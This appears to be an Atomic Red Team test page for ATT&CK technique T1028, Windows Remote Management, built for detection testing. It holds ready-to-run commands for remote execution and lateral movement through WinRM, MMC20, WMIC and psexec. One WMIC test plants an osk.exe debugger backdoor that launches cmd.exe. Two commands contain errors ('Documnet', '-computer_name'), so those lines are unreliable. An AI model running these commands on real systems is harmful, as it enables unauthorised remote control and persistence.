Skip to content

Latest commit

 

History

History
123 lines (83 loc) · 3.97 KB

T1028.md

File metadata and controls

123 lines (83 loc) · 3.97 KB

T1028 - Windows Remote Management

Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the winrm command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)

Detection: Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior. Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events.

Platforms: Windows

Data Sources: File monitoring, Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring

Permissions Required: User, Administrator

System Requirements: WinRM listener turned on and configured on remote system

Remote Support: Yes

Atomic Tests


Atomic Test #1 - Enable Windows Remote Management

Powershell Enable WinRM

Supported Platforms: Windows

Run it with powershell!

Enable-PSRemoting -Force


Atomic Test #2 - PowerShell Lateral Movement

Powershell lateral movement using the mmc20 application com object

Reference:

https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/

Supported Platforms: Windows

Inputs

Name Description Type Default Value
computer_name Name of Computer string computer1

Run it with command_prompt!

powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")


Atomic Test #3 - WMIC Process Call Create

Utilize WMIC to start remote process

Supported Platforms: Windows

Inputs

Name Description Type Default Value
user_name Username String DOMAIN\Administrator
password Password String P@ssw0rd1
computer_name Target Computer Name String Target

Run it with command_prompt!

wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"


Atomic Test #4 - Psexec

Utilize psexec to start remote process

Supported Platforms: Windows

Inputs

Name Description Type Default Value
user_name Username String DOMAIN\Administrator
password Password String P@ssw0rd1
computer_name Target Computer Name String Target

Run it with command_prompt!

psexec \\host -u domain\user -p password -s cmd.exe


Atomic Test #5 - Invoke-Command

Execute Invoke-command on remote host

Supported Platforms: Windows

Inputs

Name Description Type Default Value
host_name Remote Windows Host Name String Test
remote_command Command to execute on remote Host String ipconfig

Run it with powershell!

invoke-command -computer_name #{host_name} -scriptblock {#{remote_command}}